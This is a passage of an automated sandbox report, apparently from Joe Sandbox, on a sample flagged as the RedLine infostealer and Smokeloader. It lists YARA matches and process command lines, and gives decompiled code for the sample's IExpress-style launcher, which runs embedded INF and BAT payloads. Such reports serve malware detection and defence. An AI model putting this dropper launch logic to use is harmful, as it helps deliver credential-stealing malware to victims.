MD5 hash:	0B63FCA2981CA840B845011956E212AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.370660080.0000000002DA6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6644, Parent PID: 3528

General

Target ID:	7
Start time:	21:05:34
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff6f2860000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6684, Parent PID: 3528

General

Target ID:	8
Start time:	21:05:42
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:	0x7ff6f2860000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6792, Parent PID: 3528

General

Target ID:	9
Start time:	21:05:50
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
Imagebase:	0x7ff6f2860000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: d3HccaLUT7.exePID: 6356, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	23.9%
Dynamic/Decrypted Code Coverage:	65.7%
Signature Coverage:	25.8%
Total number of Nodes:	978
Total number of Limit Nodes:	27

Executed Functions

Function 00403BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00403BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x408004; // 0x7980a54a
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x409124 =  *0x409124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x408a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x408c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0040468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x409124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00401AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00406CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00403FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x408580;
													if( *0x408580 != 0) {
														E00402267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x408180;
											if( *0x408180 == 0) {
												_t146 = 0x4c7;
												E004044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x409124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x409a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00406495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E004044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x409124 = E00406285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E004044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x408a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x409a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x408a38 & 0x0000ffff;
											_v380 = 0x409154;
											_v376 = _t151;
											_v372 = 0x4091e4;
											_v360 = _t97;
											if( *0x408a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x409a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x408d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x409a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x40a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x409124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x409a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x408a20;
										if( *0x408a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0040202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0040468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x408c42;
									if( *0x408c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x408a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0040468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0040468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00401781( &_v276, 0x104, _t130, 0x408c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0040468F(_t130, 0x409a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00403baa
0x00403bb0
0x00403bb7
0x00403bc0
0x00403bc2
0x00403bc9
0x00403bcb
0x00403bcf
0x00403bd3
0x00403bd9
0x00403bfd
0x00403bfd
0x00403bff
0x00403c03
0x00403c03
0x00403c11
0x00403c16
0x00403c19
0x00403c28
0x00000000
0x00000000
0x00403c30
0x00403c39
0x00403c40
0x00403d13
0x00403d15
0x00403d21
0x00403d26
0x00000000
0x00403c4f
0x00403c56
0x00403c60
0x00403c65
0x00403c77
0x00403c78
0x00403c7c
0x00403c7e
0x00403c82
0x00403c82
0x00000000
0x00403c7c
0x00403c67
0x00403c69
0x00403c6d
0x00000000
0x00403c58
0x00403c58
0x00403c6e
0x00403c6e
0x00403c87
0x00403c89
0x00403d4d
0x00403d4f
0x00403d50
0x00403d52
0x00403d9e
0x00403da8
0x00403daf
0x00403db4
0x00403db6
0x00403f4d
0x00403f4d
0x00403f4f
0x00403f56
0x00403f57
0x00403f58
0x00403f63
0x00403f63
0x00403dbc
0x00403dc0
0x00403dc2
0x00403de6
0x00403de6
0x00403de8
0x00403f0b
0x00403f0b
0x00403f0f
0x00403f13
0x00403f15
0x00403f1a
0x00403f1c
0x00403f46
0x00403f47
0x00000000
0x00403f47
0x00403f1e
0x00403f1f
0x00403f25
0x00403f26
0x00403f2a
0x00403f2d
0x00403fd9
0x00403fd9
0x00403fda
0x00403fda
0x00403fe1
0x00403fe3
0x00403fe3
0x00403fe8
0x00000000
0x00403fe8
0x00403f33
0x00403f37
0x00000000
0x00403f37
0x00403dee
0x00403dee
0x00403df5
0x00403fad
0x00403fb9
0x00403fc2
0x00403fc8
0x00000000
0x00403fc8
0x00403dfb
0x00403dfd
0x00000000
0x00000000
0x00403e03
0x00403e0a
0x00000000
0x00000000
0x00403e15
0x00403e17
0x00403e19
0x00403f94
0x00403fa4
0x00403f7c
0x00403f80
0x00403f8b
0x00000000
0x00403f8b
0x00403e2c
0x00403e30
0x00403e34
0x00403e36
0x00403f69
0x00403f6e
0x00403f70
0x00403f76
0x00000000
0x00403f76
0x00403e3c
0x00403e43
0x00403e47
0x00403e52
0x00403e56
0x00403e5c
0x00403e61
0x00403e68
0x00403e70
0x00403e74
0x00403e7c
0x00403e80
0x00403e82
0x00403e82
0x00403e87
0x00403e87
0x00403e8b
0x00403e91
0x00403e94
0x00403e96
0x00403e96
0x00403e9b
0x00403e9b
0x00403e9f
0x00403ea2
0x00403ea4
0x00403ea4
0x00403ea9
0x00403ea9
0x00403ead
0x00403eb3
0x00403eb6
0x00403eb8
0x00403eb8
0x00403ebd
0x00403ebd
0x00403ec1
0x00403ec3
0x00403ec5
0x00403ec5
0x00403eca
0x00403eca
0x00403ece
0x00403ed5
0x00403ed9
0x00403ee0
0x00403ee6
0x00403eea
0x00403eec
0x00403eee
0x00403ef3
0x00403ef3
0x00403ef5
0x00403efa
0x00403efb
0x00403efd
0x00403f40
0x00000000
0x00403eff
0x00403eff
0x00403f05
0x00000000
0x00403f05
0x00403efd
0x00403dc7
0x00403dce
0x00000000
0x00000000
0x00403dd0
0x00403dd7
0x00000000
0x00000000
0x00403dd9
0x00403ddb
0x00000000
0x00000000
0x00403ddd
0x00403de1
0x00000000
0x00403de1
0x00403d59
0x00403d65
0x00403d6a
0x00403d6c
0x00000000
0x00000000
0x00403d6e
0x00403d75
0x00000000
0x00000000
0x00403d8f
0x00403d96
0x00403d98
0x00000000
0x00000000
0x00000000
0x00403d98
0x00403c8f
0x00403c98
0x00403cf1
0x00403cf3
0x00000000
0x00000000
0x00403cfe
0x00403d11
0x00000000
0x00000000
0x00000000
0x00403d11
0x00403c9c
0x00403ca5
0x00403ca7
0x00000000
0x00000000
0x00403cad
0x00403cb2
0x00403cb7
0x00403cc5
0x00000000
0x00000000
0x00403ce8
0x00403cec
0x00403ced
0x00403ced
0x00000000
0x00403ce8
0x00403c9e
0x00000000
0x00403c9e
0x00403c56
0x00403d35
0x00403d35
0x00403d3c
0x00403d48
0x00000000
0x00403d48
0x00403c03
0x00403be2
0x00403be7
0x00403bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00403C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00403CDC

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00408C42), ref: 00403D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall,?,?,?,00408C42), ref: 00403E26
FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403EFF
LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F1F
FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403F40
LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00408C42), ref: 00403F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403FC2

Strings

advpack.dll, xrefs: 00403F9D
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00403E74
RUNPROGRAM, xrefs: 00403D05
DoInfInstall, xrefs: 00403E1F, 00403E24, 00403F68
REBOOT, xrefs: 00403BE2
doza2, xrefs: 00403E68
D, xrefs: 00403C19
SHOWWINDOW, xrefs: 00403C34
USRQCMD, xrefs: 00403CAD
ADMQCMD, xrefs: 00403C9E
POSTRUNPROGRAM, xrefs: 00403D60
<None>, xrefs: 00403CC9, 00403D7D

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-1228638385
Opcode ID: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
Instruction ID: 4eb6e881215b4124141a09aa4552a99e739b7383a09d60a45f4522afb61a9575
Opcode Fuzzy Hash: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
Instruction Fuzzy Hash: C0B1B4706083019BE720DF248945B6B7AE8AB84715F10493FFA85F62E1D77C8D45CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x408004; // 0x7980a54a
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00401680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00401A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00401781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
					E0040658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00401680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E004066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E004066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00401680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00401781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E004016B3( &_v1552, 0x400, " ");
										E004016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00402AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0040171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00401A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00401A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E004044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x409120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x401140, _t156, 8,  &_v268) == 0) {
										 *0x409a34 =  *0x409a34 & 0xfffffffb;
										if( *0x409a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0040171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x409a34 =  *0x409a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00401680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00401680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00406CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00401af3
0x00401afa
0x00401b07
0x00401b09
0x00401b1a
0x00401b20
0x00401b2c
0x00401b3b
0x00401b40
0x00401b2e
0x00401b2e
0x00401b33
0x00401b33
0x00401b46
0x00401b4c
0x00401b52
0x00401b57
0x00401b5d
0x00401b61
0x00401b9f
0x00401b9f
0x00401bb1
0x00401bc2
0x00000000
0x00401b63
0x00401b63
0x00401b65
0x00401b68
0x00401b68
0x00401b6a
0x00401b6b
0x00401b6f
0x00401b74
0x00000000
0x00000000
0x00401b76
0x00401b7b
0x00401b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b8c
0x00401b8c
0x00401b98
0x00401bc7
0x00401bc9
0x00401bcc
0x00401bd3
0x00401d75
0x00401d76
0x00401d78
0x00401d7f
0x00401e05
0x00401e09
0x00000000
0x00000000
0x00401e12
0x00401e1b
0x00401e73
0x00401e21
0x00401e21
0x00401e28
0x00401e37
0x00401e3e
0x00401e52
0x00401e60
0x00401e60
0x00401e3e
0x00401e79
0x00401e7b
0x00401e84
0x00000000
0x00401d9b
0x00401d9b
0x00401da0
0x00401da2
0x00401da5
0x00401da5
0x00401da7
0x00401da8
0x00401dac
0x00401dae
0x00401db4
0x00401db7
0x00401db7
0x00401db9
0x00401dba
0x00401dbe
0x00401dc3
0x00401dce
0x00401dd2
0x00401deb
0x00000000
0x00401df0
0x00000000
0x00401dd2
0x00401bf7
0x00401bfe
0x00401c07
0x00401d55
0x00401d5a
0x00401d5b
0x00401d5d
0x00401d5e
0x00000000
0x00401c1b
0x00401c1b
0x00401c20
0x00401c2c
0x00401c33
0x00401c38
0x00401c3a
0x00401c3a
0x00401c40
0x00401c4b
0x00401c4b
0x00401c5d
0x00401c61
0x00401dd4
0x00401dd4
0x00401dd6
0x00401ddb
0x00401ddc
0x00401dde
0x00401d64
0x00401d64
0x00401d67
0x00401d6c
0x00000000
0x00401c67
0x00401c67
0x00401c6d
0x00401c72
0x00401c74
0x00401c74
0x00401c8e
0x00401c99
0x00401cc0
0x00401cf8
0x00401d07
0x00401d23
0x00401d09
0x00401d14
0x00401d1b
0x00401d1b
0x00401d2b
0x00401d2d
0x00401d2d
0x00401d38
0x00401d39
0x00401d46
0x00401cc2
0x00401cc2
0x00401ccc
0x00401cce
0x00401cce
0x00401cdb
0x00401ce6
0x00401cee
0x00401cee
0x00401e89
0x00401e91
0x00401e92
0x00401e94
0x00401e97
0x00401ea4
0x00401ea4
0x00401c61
0x00401c07
0x00401bd3
0x00401b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C57
GetPrivateProfileIntA.KERNEL32 ref: 00401C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00401140,00000000,00000008,?), ref: 00401CB8
GetShortPathNameA.KERNEL32 ref: 00401D1B

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

.INF, xrefs: 00401BDB
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00401BA0
AdvancedINF, xrefs: 00401CAE
setupapi.dll, xrefs: 00401D23, 00401D3A
setupx.dll, xrefs: 00401D14
DefaultInstall, xrefs: 00401C74, 00401C87, 00401CCE, 00401CD3, 00401D2D, 00401D39
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00401D3B
Version, xrefs: 00401CB3
.BAT, xrefs: 00401D83
", xrefs: 00401B25
Command.com /c %s, xrefs: 00401D9B, 00401DE8
Reboot, xrefs: 00401C82

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
